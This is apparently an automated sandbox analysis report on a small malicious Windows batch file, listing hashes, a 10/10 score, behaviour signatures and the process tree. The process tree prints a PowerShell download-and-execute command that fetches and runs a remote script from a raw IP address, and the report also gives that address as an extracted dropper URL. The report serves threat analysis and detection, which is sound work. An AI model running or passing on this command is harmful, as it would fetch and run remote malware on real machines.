Analysis
-
max time kernel
112s -
max time network
119s -
platform
windows7_x64 -
resource
win7 -
submitted
03-08-2020 09:10
General
-
Target
2b4587aed40db6e44cbff092b52b841e.bat
-
Size
218B
-
MD5
c69dabb8c2f1ca155fb5fe3b0482d0a7
-
SHA1
b3faaf0bd82fe27b076ec814b2123cf962ead51b
-
SHA256
99824d3ef35b84b0fc40214867e3c54e5518491efa1c5c9d796b1acb2cbe81d7
-
SHA512
c5fc762e4d76e921bd55faa68fff86efe13f0b49b7cbeaaf2d4050cbb8e65f400399d84acf4056e36c8f560a8e9a7fd5b9c711fcb0ef23f65f14ea0724eef174
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e
Signatures
-
Suspicious use of WriteProcessMemory 4 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Blacklisted process makes network request 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\2b4587aed40db6e44cbff092b52b841e.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e');Invoke-SLSOBOXXDQW;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request